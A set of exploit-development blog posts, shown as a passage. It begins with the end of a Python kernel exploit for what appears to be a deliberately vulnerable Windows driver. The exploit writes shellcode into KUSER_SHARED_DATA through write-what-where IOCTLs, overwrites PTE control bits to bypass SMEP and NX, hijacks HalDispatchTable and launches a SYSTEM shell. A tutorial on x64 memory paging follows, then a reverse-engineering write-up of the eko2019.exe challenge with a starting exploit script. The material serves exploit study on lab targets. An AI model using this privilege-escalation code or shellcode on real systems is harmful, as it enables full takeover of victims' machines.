www_shellcode_four.What_Shellcode_4 = addressof(fourth_shellcode)
www_shellcode_four.Where_Shellcode_4 = KUSER_SHARED_DATA + 0x818
www_shellcode_four_pointer = pointer(www_shellcode_four)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x818..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_four_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
fifth_shellcode = c_ulonglong(0x000002E88B8B4800)

# Write-what-where structure #6
www_shellcode_five = WriteWhatWhere_Shellcode_5()
www_shellcode_five.What_Shellcode_5 = addressof(fifth_shellcode)
www_shellcode_five.Where_Shellcode_5 = KUSER_SHARED_DATA + 0x820
www_shellcode_five_pointer = pointer(www_shellcode_five)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x820..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_five_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
sixth_shellcode = c_ulonglong(0x8B48E57504F98348)

# Write-what-where structure #7
www_shellcode_six = WriteWhatWhere_Shellcode_6()
www_shellcode_six.What_Shellcode_6 = addressof(sixth_shellcode)
www_shellcode_six.Where_Shellcode_6 = KUSER_SHARED_DATA + 0x828
www_shellcode_six_pointer = pointer(www_shellcode_six)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x828..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_six_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
seventh_shellcode = c_ulonglong(0xF0E180000003588B)

# Write-what-where structure #8
www_shellcode_seven = WriteWhatWhere_Shellcode_7()
www_shellcode_seven.What_Shellcode_7 = addressof(seventh_shellcode)
www_shellcode_seven.Where_Shellcode_7 = KUSER_SHARED_DATA + 0x830
www_shellcode_seven_pointer = pointer(www_shellcode_seven)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x830..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_seven_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Next 8 bytes
eighth_shellcode = c_ulonglong(0x4800000358888948)

# Write-what-where structure #9
www_shellcode_eight = WriteWhatWhere_Shellcode_8()
www_shellcode_eight.What_Shellcode_8 = addressof(eighth_shellcode)
www_shellcode_eight.Where_Shellcode_8 = KUSER_SHARED_DATA + 0x838
www_shellcode_eight_pointer = pointer(www_shellcode_eight)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x838..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_eight_pointer,        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Last 8 bytes
ninth_shellcode = c_ulonglong(0x0000000000C3C031)

# Write-what-where structure #10
www_shellcode_nine = WriteWhatWhere_Shellcode_9()
www_shellcode_nine.What_Shellcode_9 = addressof(ninth_shellcode)
www_shellcode_nine.Where_Shellcode_9 = KUSER_SHARED_DATA + 0x840
www_shellcode_nine_pointer = pointer(www_shellcode_nine)

# Print update for shellcode
print "[+] Writing next 8 bytes of shellcode to KUSER_SHARED_DATA + 0x840..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_shellcode_nine_pointer,         # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Phase 3: Extract KUSER_SHARED_DATA + 0x800's PTE control bits

# Declaring C void pointer to stores PTE control bits
pte_bits_pointer = c_void_p()

# Write-what-where structure #11
www_pte_bits = WriteWhatWhere_PTE_Control_Bits()
www_pte_bits.What_PTE_Control_Bits = kuser_shared_data_800_pte_address
www_pte_bits.Where_PTE_Control_Bits = addressof(pte_bits_pointer)
www_pte_bits_pointer = pointer(www_pte_bits)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_bits_pointer,               # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# CTypes way of extracting value from a C void pointer
pte_control_bits_no_execute = struct.unpack('<Q', pte_bits_pointer)[0]

# Print update for PTE control bits
print "[+] PTE control bits for KUSER_SHARED_DATA + 0x800: {:016x}".format(pte_control_bits_no_execute)

# Phase 4: Overwrite current PTE U/S bit for shellcode page with an S (supervisor/kernel)

# Setting KUSER_SHARED_DATA + 0x800 to executable
pte_control_bits_execute= pte_control_bits_no_execute & 0x0FFFFFFFFFFFFFFF

# Need to store the PTE control bits as a pointer
# Using addressof(pte_overwrite_pointer) in Write-what-where structure #4 since a pointer to the PTE control bits are needed
pte_overwrite_pointer = c_void_p(pte_control_bits_execute)

# Write-what-where structure #12
www_pte_overwrite = WriteWhatWhere_PTE_Overwrite()
www_pte_overwrite.What_PTE_Overwrite = addressof(pte_overwrite_pointer)
www_pte_overwrite.Where_PTE_Overwrite = kuser_shared_data_800_pte_address
www_pte_overwrite_pointer = pointer(www_pte_overwrite)

# Print update for PTE overwrite
print "[+] Overwriting KUSER_SHARED_DATA + 0x800's PTE..."

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pte_overwrite_pointer,          # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Print update for PTE overwrite round 2
print "[+] KUSER_SHARED_DATA + 0x800 is now executable! See you later, SMEP!"

# Phase 5: Shellcode

# nt!HalDispatchTable address (Windows 10 RS1 offset)
haldispatchtable_base_address = kernel_address + 0x2f43b0

# nt!HalDispatchTable + 0x8 address
haldispatchtable = haldispatchtable_base_address + 0x8

# Print update for nt!HalDispatchTable + 0x8
print "[+] nt!HalDispatchTable + 0x8 is located at: {0}".format(hex(haldispatchtable))

# Declaring KUSER_SHARED_DATA + 0x800 address again as a c_ulonglong to satisy c_void_p type from strucutre.
KUSER_SHARED_DATA_LONGLONG = c_ulonglong(0xFFFFF78000000800)

# Write-what-where structure #13
www = WriteWhatWhere()
www.What = addressof(KUSER_SHARED_DATA_LONGLONG)
www.Where = haldispatchtable
www_pointer = pointer(www)

# 0x002200B = IOCTL code that will jump to TriggerArbitraryOverwrite() function
print "[+] Interacting with the driver..."
    handle,                             # hDevice
    0x0022200B,                         # dwIoControlCode
    www_pointer,                        # lpInBuffer
    0x8,                                # nInBufferSize
    None,                               # lpOutBuffer
    0,                                  # nOutBufferSize
    byref(c_ulong()),                   # lpBytesReturned
    None                                # lpOverlapped

# Actually calling NtQueryIntervalProfile function, which will call HalDispatchTable + 0x8, where the shellcode will be waiting.

# Print update for shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!"
os.system("cmd.exe /K cd C:\\")


Final Thoughts

I really enjoyed this method of SMEP bypass! I also loved circumventing SMEP all together and bypassing NonPagedPoolNx via KUSER_SHARED_DATA+0x800 without the need for user mode memory!

I am always looking for new challenges and decided this would be a fun one!

If you would like to take a look at how SMEP can be bypassed via U/S bit corruption in C, here is this same exploit written in C (note - some offsets may be different).

As always, feel free to reach out to me with any questions, comments, or corrections! Until then!

Peace, love, and positivity! :-)

Turning the Pages: Introduction to Memory Paging on Windows 10 x64

26 April 2020 at 00:00


0xFFFFFFFF11223344 is an example of a virtual memory address, and anyone who spends a lot of time inside of a debugger may be familiar with this notion. β€œOh, that address is somewhere in memory and references X” may be an inference that is made about a virtual memory address. I always wondered where this address schema came from. It wasn’t until I started doing research into kernel mode mitigation bypasses that I realized learning where these virtual addresses originate from is a very important concept. This blog will by no means serve as a complete guide to virtual and physical memory in Windows, as it could EASILY be a multi series blog post. This blog is meant to serve as the prerequisite knowledge needed to do things like change permissions of a memory page in kernel mode with a vulnerability such as a write-what-where bug to bypass kernel mitigations such as SMEP or NonPagedPoolNx through page table entries.

Let’s dive into memory paging, and see where these virtual memory addresses originate from and what we can learn from these seemingly obscured 8 bytes we stumble across so copiously.

Firstly, before we begin, if you want a full fledged low level explanation of nearly every aspect of memory in Windows (which far surpasses the scope of this blog post) I HIGHLY suggest reading What Makes It Page?: The Windows 7 (x64) Virtual Memory Manager written by Enrico Martignetti. In addition to paging, we will look at some ways we can use WinDbg to automate some of the more admittedly cumbersome steps in the memory paging process.

Paging? ELI5?

Memory paging refers to the implementation of virtual memory by the MMU (memory management unit). Virtual memory is mapped to physical memory, known as RAM (and in some cases, actually to disk temporarily if physical memory needs to be optimized elsewhere).

One of the main reasons that memory paging is generally enabled, is the concept of β€œresource sharing”. For example, if we have two instances of the calc.exe - these two instances can share physical memory. Sharing physical memory is very important, as RAM is an expensive resource.

Take a look at the below image, from the Windows Internals, Part 1 (Developer Reference) 7th Edition book to get a better understanding visually of virtual to physical memory mapping.

In addition to this information, it is important to note that a physical memory page is generally 4 KB (2 MB and even 1 GB pages can be addressed, but that is beyond the scope of this blog) in size on x64 Windows. We will see how this comes to fruition in upcoming sections of this post.

Before diving straight in to some of the lower level details, it is important to note there are a few different β€œpaging modes” that can be utilized. Paging modes refer to the way paging is executed. The paging mode we will be referring to and using (as is default on basically every x64 version of Windows) is Long-Mode Paging.

Are We There Yet?

If we want to understanding WHAT paging actually does, let’s take a look a moment and analyze how paging is actually enabled! Looking at some of the control registers will show us if/how paging is enabled and what paging mode are we using.

According to the Intel 64 and IA-32 Architectures Software Developer’s Manual, the CR0 register is responsible for paging being enabled.

CR0.PG refers to the 31st bit of the CR0 register. If this bit is set to 1, paging is enabled. If it is set to 0, paging is disabled.

The above image is from a default installation of Windows 10 x64, showing the 31st bit of the CR0 bit is set to 1.

We now know that paging is enabled based on the image above - but what kind of paging are we using? Referring again to the Intel manual, we notice that the CR4 control register is responsible for implementing the paging mode we are using.

As mentioned previously, the paging mode we are using is called Long-Mode Paging. Long-Mode Paging is another way of saying that Physical Address Extension, or PAE, is enabled. PAE enables 64-bit paging. If PAE was disabled, only 32-bit paging would be possible.

The 5th bit of the CR4 register is responsible for PAE being enabled. 1 = enabled, 0 = disabled.

We can also see, on a default installation of Windows 10 x64, PAE is enabled by default.

Now that we know how to identify IF and WHAT KIND of paging is enabled, let’s get into virtual to physical address translation!

Let’s Get Physical!

The easiest way to think about a virtual memory address, and where it comes from, is to look at it from a different perspective. Don’t take it at face value. Understanding what the virtual address is trying to accomplish, will surely shed some light on this whole process.

A virtual address is simply a computation of various indexes into several paging structures used to fetch the corresponding physical page to a virtual page.

Take a look at the image below, taken from the AMD64 Architecture Programmer’s Manual Volume 2.

Although this image above looks very intimidating, let’s break it down.

As we can see, the virtual address in this case is a 64-bit virtual address. The first portion of the address, bits 63-48, are represented as β€œSign Extend”. Let’s leave this on the back burner for the time being.

We can see there are four paging structures in use:

  1. Page-Map Level-4 Table (PML4) (Bits 47-39)
  2. Page-Directory-Pointer Table (PDPT) (Bits 38-30)
  3. Page-Directory Table (PDT) (Bits 29-21)
  4. Page Table (PT) (Bits 20-12)

Each 8 bits of a virtual address (47-39, 38-30, 29-21, 20-12, 11-0) are actually just indexes of various paging structure tables.

In addition, each paging structure table contains 512 page table entries (PxE).

So in totality, each paging structure is really a table with 512 entries each.

For each physical memory page the MMU wants to attribute to a virtual memory page, the MMU will access an entry from each table (a page table entry) that will β€œlead us” to the next paging structure in line.This process will go on, until a final 4 KB physical page (more on this later) is retrieved.

Think of it as needing to pick a specific entry from each table to reach our final 4 KB physical memory page. We will get into some very high level mathematical computations on how this is done later, and seeing the exact anatomy of a virtual address in WinDbg.

Now that we have some high level understanding of the various paging structures, and before diving into the paging structures and the CR3 register (PML4, I am looking at you) - let’s circle back to bits 63-48, which are represented as β€œSign Extend”

Canonical Addressing

In a 64-bit architecture, each virtual memory address has a total of 8 bytes, compared to a 4 byte x86 virtual memory address.

Referring back to the above section, we can recall that bits 63-48 are not accessing any paging structures. What is the purpose of this? It has to do with the limitations of the MMU.

Technically, a 64-bit system only uses 48 bits of its total power. This is because if a 64-bit system allowed all 64 bits to be addressed, the system would need to be able to address 16 exabytes of total virtual memory. 1 exabyte is equivalent to 1000000 terabytes (TB). The MMU would not be able to keep track of all of this from a translations perspective firstly (efficiently), and secondly (and most importantly) systems today cannot support this much virtual memory.

The CPU implements a β€œgovernor” of sorts, which limits 64-bit addresses to 48-bit addresses. An address in which bits 63-47 are sign extended is known as a canonical address.

Sign extending bits 63-47 limits the virtual address space to 256 TB of RAM. This is still a lot, but it is still feasible.

Let’s take a look to see how this all breaks down.

Referencing the Intel manual again, sign extending occurs in the following manner. Bit 47 is responsible for what bits 63-47 will be set to.

If bit 47 is set to 0, bits 63-48 will also be set to 0. If bit 47 is set to 1, bits 63-48 will be set to 1 (resulting in hexadecimal F’s in the virtual address).

The below chart, from Intel shows what addresses are valid and what addresses are invalid, in accordance with canonical addressing and sign extending. Note that we are only interested in the 48-bit addressing chart. 56-bit addressing refers to level 5 paging and 64-bit addressing refers to using the whole 64-bit address space.

Let’s look at two examples below.

The first example is the address KERNELBASE!VirtualProtect which has a virtual memory address of 00007ffce032cfc0. Breaking the address down into binary, we can see bit 47 is set to 0. Subsequently, bits 63-48 are also set to 0.

Generally, user mode addresses are going to be sign extended with a 0.

Taking a look at a kernel mode address, nt!MiGetPteAddress, we can see in this case bit 47 is set to 1. Meaning bits 63-48 are also set to 1, resulting in all hexadecimal F’s occurring in the virtual address as seen below.

Now that we see how addressing is limited, let’s get into the breakdown of a virtual address.

(Question to you, the reader. Now that we know 64-bit systems only utilize 48 bits, do you see a clear need for 128-bit processors in the near future?)

The Anatomy of a Virtual Address (In All of Its Glory)

Let’s talk about paging structures and page table entries once again before we get into breaking down a virtual address.

Recall there are 4 main paging structures:

  1. Page-Map Level-4 Table (PML4)
  2. Page-Directory-Pointer Table (PDPT)
  3. Page-Directory Table (PDT)
  4. Page Table (PT)

As a point of contention, a page table entry for each of these structures removes the β€œT” from the acronym and replaces it with an β€œE”. For instance, an entry from the PDT is known as a PDE. An entry from the PT is known as a PTE and so on.

Recall that each one of these structures is a table that has 512 entries each. One PML4E can address up to 512 GB of memory. One PDPE can address 1 GB. One PDE can address 2 MB. Finally, one PTE can map 4 KB, or a physical memory page.

Note that the actual size of each entry is 8 bytes (the size of a virtual memory address in a 64-bit architecture).

Let’s talk about PML4 table briefly, which cannot be talked about without mentioning the CR3 register.

The CR3 register actually contains a physical memory address, which actually serves as the PML4 table base. This can be seen in the image below, where CR3 loads an actually physical memory address.

This is how the paging process begins, as the PML4 can be fetched from the CR3 register.

Again, to reiterate, The PML4 (via the CR3 register) indexes the PDPT table and fetches an entry. The PDPT indexes the base of the PDT table and fetches an entry. The PDT table indexes the PT table and fetches a 4 KB physical memory page.

Before moving on, there is one special thing to note, and that is the actual page table (PT).

Once the page table (PT) has been indexed in bits 20-12, bits 11-0 no longer need to fetch an index from any other paging structures. Bits 11-0 actually serve as an offset to a physical memory page 4 KB in size. Recall that an offset is the distance between two places (generally from a base, the PT in this case, to another location). Bits 11-0 simply serve as the actual distance from the page table base to the actual location of the physical memory. We will see this outlined very shortly when we perform a page translation in WinDbg.

Now that we understand at a bit of a lower level how each paging structure is indexed, let’s take it an even lower level.

Finally, an Example!

VirtualAlloc() is a routine in Windows that creates a region of virtual memory and returns a pointer to this virtual memory.

In our example, the virtual memory address 510000 is a virtual memory address that was created by KERNELBASE!VirtualAlloc. Let’s run the !pte command in WinDbg to see what we are working with here.

One thing to notate before moving on, WinDbg references a few paging structures and entries a bit differently. Namely, they are:

  1. PXE = PML4E
  2. PPE = PDPE

Moving on, we can see each structure’s entries can all be found at their respective virtual addresses, shown above as:

  1. PML4E at FFFFF6FB7DBED000
  2. PDPE at FFFFF6FB7DA00000
  3. PDTE at FFFFF6FB40000010
  4. PTE at FFFFF68000002880

This is because the !pte output converts the entries to virtual addresses before being displayed. We don’t care so much about the virtual addresses (for the time being) because we are trying to see how virtual addresses are converted into physical addresses.

In order to reach our goal, right now we only care about pfn which we can see from the !pte output. Let’s understand the pfn means firstly, as this will help us understand the output of !pte and fetching a physical page associated with a virtual page.

A PFN, or page frame number, refers to the next paging structure in the hierarchy. PFNs work with PTEs, in that PTEs fetch the PFN for the next paging structure. That PFN is then multiplied by 0x1000 (4 KB) to retrieve the physical address of the next paging structure. We will hit more on this now.

In the output of !pte we see there is a PML4E. A PML4E , as we know, will fetch the base address of the PDPT table. From there, it will index an entry from the next table, known as a PDPE.

The PFN, as we can see from the output in WinDbg in the earlier screenshot, that PML4 is using to index the PDPT table is 7bbc8. This means this should be the page frame number for the PDPT, as we know a page frame number refers to the next paging structure in the hierarchy.

We will now use !vtop to convert the PDPT to a physical address to verify that the PML4E entry is indexing the correct paging structure.

Let’s breakdown this command firstly.

The 7be59000 value in the above command is the base paging structure in the CR3 register, the PML4 physical address. When using !vtop, you use this address to specify the base paging structure. After that, we have the virtual address we want to convert.

As we can see, the PDPT is located at a physical address of 7bbc8000! This is perfect, because this is the PFN value used by the PML4 structure to index the next paging structure, PDPT. Recall earlier, that we multiply the PFN (7bbc8 in this case) by 0x1000, which gives us a physical memory address of 7bbc8000 - which represents the PDPT.

Let’s verify in WinDbg with !dd, which will dump physical memory, that the virtual address of the PDPE and the physical address both are the same.

As we can see, the physical and virtual memory addresses contain the same values.

Too Many Acronyms!

This is an ideal example to show that a physical page of memory is actually NOTHING MORE than a PFN multiplied by 0x1000 and an offset to the physical memory page! A PFN, as we can recall, is a reference to the base of the next paging structure.

Since we converted the PDPT address (which is a base address to begin with), there was no offset in the physical translation, meaning that the PFN was appended with 0’s.

This is mainly because we were fetching the base address of a paging structure, which means it won’t be offset from anything.

If our virtual address would have been FFFFF6FB7DA00008, for instance, our physical address would have been 7bbc8008. This is because the address is at an offset of 0x8 from the base of the PFN!

Awesome, we know know what a physical memory address looks like at a high level. But each entry in a paging structure (a PTE) contains more metadata. What does this metadata look like and how is it useful?

PTEs - For Real This Time

Let’s take a look back at an image that was already displayed, in the !pte output.

More specifically, let’s take a look at the PTE entry, furthest to the right.

PTE at FFFFF68000002880
contains 7A9000007BBA9867
pfn 7bba9     ---DA--UWEV

Let’s take a look at the entry, more specifically the contains line which contains 7A9000007BBA9867.

We can clearly see the PFN here, in between the 7A900000 and 867. But what do these other numbers mean? Additionally, what does ---DA--UWEV mean? These refer to β€œcontrol bits”, which provision various permissions, features, etc to the memory page. Let’s take a look at each of these bits.

Here are a list of some of the possible control bits. These bits are the ones we care about, and it is not an exhaustive list.

  1. P - The PTE is valid if this bit is set
  2. R/W - Writing is enabled if this bit is set
  3. U/S - If this bit is set, the page is a user mode page. If this bit is clear, the page is a supervisor (kernel) mode page
  4. D - If this bit is set, a write has been made to this page, making it a β€œdirty” page
  5. A - If this bit is set, this memory page has been referenced at some point

Mouth Of The River

Again, this was by no means meant to be an exhaustive and comprehensive β€œtell all” of memory paging. This article barely scratched the surface. However, understanding things like control bits and virtual memory and having that as prerequisite knowledge allows you to understand bypassing mitigations such as NX in kernel pool memory, or more ways of bypassing SMEP. The next post will go into bypassing SMEP and NX in the kernel by way of the prerequisite knowledge laid out here.

You know the drill, any comments, questions, corrections, feel free to reach out to me. Until then!

Peace, love, and positivity! :-)

Exploit Development: Rippity ROPpity The Stack Is Our Property - Blue Frost Security eko2019.exe Full ASLR and DEP Bypass on Windows 10 x64

27 March 2020 at 00:00


I recently have been spending the last few days working on obtaining some more experience with reverse engineering to complement my exploit development background. During this time, I stumbled across this challenge put on by Blue Frost Security earlier in the year- which requires both reverse engineering and exploit development skills. Although I would by no means consider myself an expert in reverse engineering, I decided this would be a nice way to try to become more well versed with the entire development lifecycle, starting with identifying vulnerabilities through reverse engineering to developing a functioning exploit.

Before we begin, I will be using using Ghidra and IDA Freeware 64-bit to reverse the eko2019.exe application. In addition, I’ll be using WinDbg to develop the exploit. I prefer to use IDA to view the execution of a program- but I prefer to use the Ghidra decompiler to view the code that the program is comprised of. In addition to the aforementioned information, this exploit will be developed on Windows 10 x64 RS2, due to the fact the I already had a VM with this OS ready to go. This exploit will work up to Windows 10 x64 RS6 (1903 build), although the offsets between addresses will differ.

Reverse, Reverse!

Starting the application, we can clearly see the server has echoed some text into the command prompt where the server is running.

After some investigation, it seems this application binds to port 54321. Looking at the text in the command prompt window leads me to believe printf(), or similar functions, must have been called in order for the application to display this text. I am also inclined to believe that these print functions must be located somewhere around the routine that is responsible for opening up a socket on port 54321 and accepting messages. Let’s crack open eko2019.exe in IDA and see if our hypothesis is correct.

By opening the Strings subview in IDA, we can identify all of the strings within eko2019.exe.

As we can see from the above image, we have identified a string that seems like a good place to start! "[+] Message received: %i bytes\n" is indicative that the server has received a connection and message from the client (us). The function/code that is responsible for incoming connections may be around where this string is located. By double-clicking on .data:000000014000C0A8 (the address of this string), we can get a better look at the internals of the eko2019.exe application, as shown below.

Perfect! We have identified where the string "[+] Message received: %i bytes\n" resides. In IDA, we have the ability to cross reference where a function, routine, instruction, etc. resides. This functionality is outlined by DATA XREF: sub_1400011E0+11E↑o comment, which is a cross reference of data in this case, in the above image. If we double click on sub_1400011E0+11E↑o in the DATA XREF comment, we will land on the function in which the "[+] Message received: %i bytes\n" string resides.

Nice! As we can see from the above image, the place in which this string resides, is location (loc) loc_1400012CA. If we trace execution back to where it originated, we can see that the function we are inside is sub_1400011E0 (eko2019.exe+0x11e0).

After looking around this function for awhile, it is evident this is the function that handles connections and messages! Knowing this, let’s head over to Ghidra and decompile this function to see what is going on.

Opening the function in Ghidra’s decompiler, a few things stand out to us, as outlined in the image below.

Number one, The local_258 variable is initialized with the recv() function. Using this function, eko2019.exe will β€œread in” the data sent from the client. The recv() function makes the function call with the following arguments:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function.
  • A pointer to where the buffer that was received will be written to (local_28).
  • The specified length which local_28 should be (0x10 hexadecimal bytes/16 decimal bytes).
  • Zero, which represents what flags should be implemented (none in this case).

What this means, is that the size of the request received by the recv() function will be stored in the variable local_258.

This is how the call looks, disassembled, within IDA.

The next line of code after the value of local_258 is set, makes a call to printf() which displays a message indicating the β€œheader” has been received, and prints the value of local_258.


We can interpret this behavior as that eko2019.exe seems to accept a header before the β€œmessage” portion of the client request is received. This header must be 0x10 hexadecimal bytes (16 decimal bytes) in length. This is the first β€œcheck” the application makes on our request, thus being the first β€œcheck” we must bypass.

Number two, after the header is received by the program, the specific variable that contains the pointer to the buffer received by the previous recv() request (local_28) is compared to the string constant 0x393130326f6b45, or Eko2019 in text form, in an if statement.

if (local_28 == 0x393130326f6b45) {

Taking a look at the data type of the local_28, declared at the beginning of this function, we notice it is a longlong. This means that the variable should 8 bytes in totality. We notice, however, that 0x393130326f6b45 is only 7 bytes in length. This behavior is indicatory that the string of Eko2019 should be null terminated. The null character will provide the last byte needed for our purposes.

This is how this check is executed, in IDA.

Number three, is the variable local_20’s size is compared to 0x201 (513 decimal).

if (local_20 < 0x201) {

Where does this variable come from you ask? If we take a look two lines down, we can see that local_20 is used in another recv() call, as the length of the buffer that stores the request.

local_258 = recv(param_1,local_238,(uint)(ushort)local_20,0);

The recv() call here again uses the same type of arguments as the previous call and reuses the variable local_258. Let’s take a look at the declaration of the variable local_238 in the above recv() function call, as it hasn’t been referenced in this blog post yet.

char local_238 [512];

This allocates a buffer of 512 bytes. Looking at the above recv() call, here is how the arguments are lined up:

  • A socket file descriptor, param_1, which is inherited from the void FUN_1400011e0 function is used again.
  • A pointer to where the buffer that was received will be written to (local_238 this time, which is 512 bytes).
  • The specified length, which is represented by local_20. This variable was used in the check implemented above, which looks to see if the size of the data recieved in the buffer is 512 bytes or less.
  • Zero, which represents what flags should be implemented (none in this case).

The last check looks to see if our message is sent in a multiple of 8 (aka aligned properly with a full 8 byte address). This check can be identified with relative ease.

uVar2 = (int)local_258 >> 0x1f & 7;
if ((local_258 + uVar2 & 7) == uVar2) {
          iVar1 = printf(s__[+]_Remote_message_(%i):_'%s'_14000c0f8,(ulonglong)DAT_14000c000, local_238);

The size of local_258, which at this point is the size of our message (not the header), is shifted to the right, via the bitwise operator >>. This value is then bitwise AND’d with 7 decimal. This is what the result would look like if our message size was 0x200 bytes (512 decimal), which is a known multiple of 8.

This value gets stored in the uVar2 variable, which would now have a value of 0, based on the above photo.

If we would like our message to go through, it seems as though we are going to need to satisfy the above if statement. The if statement adds the value of local_258 (presumably 0x200 in this example) to the value of uVar2, while using bitwise AND on the result of the addition with 7 decimal. If the total result is equal to uVar2, which is 0, the message is sent!

As we can see, the statement local_258 + uVar2 == uVar2 is indeed true, meaning we can send our message!

Let’s try another scenario with a value that is not a multiple of 8, like 0x199.

Using the same forumla above, with the bitwise shift right operator, we yield a value of 0.

Taking this value of 0, adding it to 0x199 and using bitwise AND on the result- yields a nonzero value (1).

This means the if statement would have failed, and our message would not go have gone through (since 0x199 is not a multiple of 8)!

In total, here are the checks we must bypass to send our buffer:

  1. A 16 byte header (0x10 hexadecimal) with the string 0x393130326f6b45, which is null terminated, as the first 8 bytes (remember, the first 16 bytes of the request are interpreted as the header. This means we need 8 additional bytes appended to the null terminated string).
  2. Our message (not counting the header) must be 512 bytes (0x200 hexadecimal bytes) or less
  3. Our message’s length must be a multiple of 8 (the size of an x64 memory address)

Now that we have the ability to bypass the checks eko2019.exe makes on our buffer (which is comprised of the header and message), we can successfully interact with the server! The only question remains- where exactly does this buffer end up when it is received by the program? Will we even be able to locate this buffer? Is this only a partial write? Let’s take a look at the following snippet of code to find out.

local_250[0] = FUNC_140001170
hProcess = GetCurrentProcess();

The Windows API function GetCurrentProcess() first creates a handle to the current process (eko2019.exe). This handle is passed to a call to WriteProcessMemory(), which writes data to an area of memory in a specified process.

According Microsoft Docs (formerly known as MSDN), a call to WriteProcessMemory() is defined as such.

BOOL WriteProcessMemory(
  HANDLE  hProcess,
  LPVOID  lpBaseAddress,
  LPCVOID lpBuffer,
  SIZE_T  nSize,
  SIZE_T  *lpNumberOfBytesWritten
  • hProcess in this case is will be set to the current process (eko2019.exe).
  • lpBaseAddress is set to the function inside of eko2019.exe, sub_140001000 (eko2019.exe+0x1000). This will be where WriteProcessMemory() starts writing memory to.
  • lpBuffer is where the memory written to lpBaseAddress will be taken from. In our case, the buffer will be taken from function sub_140001170 (eko2019.exe+0x1170), which is represented by the variable local_250.
  • nSize is statically assigned as a value of 8, this function call will write one QWORD.
  • *lpNumberOfBytesWritten is a pointer to a variable that will receive the number of bytes written.

Now that we have better idea of what will be written where, let’s see how this all looks in IDA.

There are something very interesting going on in the above image. Let’s start with the following instructions.

lea rcx, unk_14000E520
mov rcx, [rcx+rax*8]
call sub_140001170

If you can recall from the WriteProcessMemory() arguments, the buffer in which WriteProcessMemory() will write from, is actually from the function sub_140001170, which is eko2019.exe+0x1170 (via the local_250 variable). From the above assembly code, we can see how and where this function is utilized!

Looking at the assembly code, it seems as though the unkown data type, unk_14000E520, is placed into the RCX register. The value pointed to by this location (the actual data inside the unknown data type), with the value of RAX tacked on, is then placed fully into RCX. RCX is then passed as a function parameter (due to the x64 __fastcall calling convention) to function sub_140001170 (eko2019.exe+0x1170).

This function, sub_140001170 (eko2019.exe+0x1170), will then return its value. The returned value of this function is going to be what is written to memory, via the WriteProcessMemory() function call.

We can recall from the WriteProcessMemory() function arguments earlier, that the location to which sub_140001170 will be written to, is sub_140001000 (eko2019.exe+0x1000). What is most interesting, is that this location is actually called directly after!

call sub_140001000

Let’s see what sub_140001000 looks in IDA.

Essentially, when sub_140001000 (eko2019.exe+0x1000) is called after the WriteProcessMemory() routine, it will land on and execute whatever value the sub_140001170 (eko2019.exe+0x1170) function returns, along with some NOPS and a return.

Can we leverage this functionality? Let’s find out!

Stepping Stones

Now that we know what will be written to where, let’s set a breakpoint on this location in memory in WinDbg, and start stepping through each instruction and dumping the contents of the registers in use. This will give us a clearer understanding of the behavior of eko2019.exe

Here is the proof of concept we will be using, based on the checks we have bypassed earlier.

import sys
import os
import socket
import struct
import time

# Defining sleep shorthand
sleep = time.sleep

# 16 total bytes
print "[+] Sending the header..."
exploit = "\x45\x6B\x6F\x32\x30\x31\x39\x00" + "\x90"*8

# 512 bytes + 16 byte header = 528 total bytes
exploit += "\x41" * 512

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 54321))

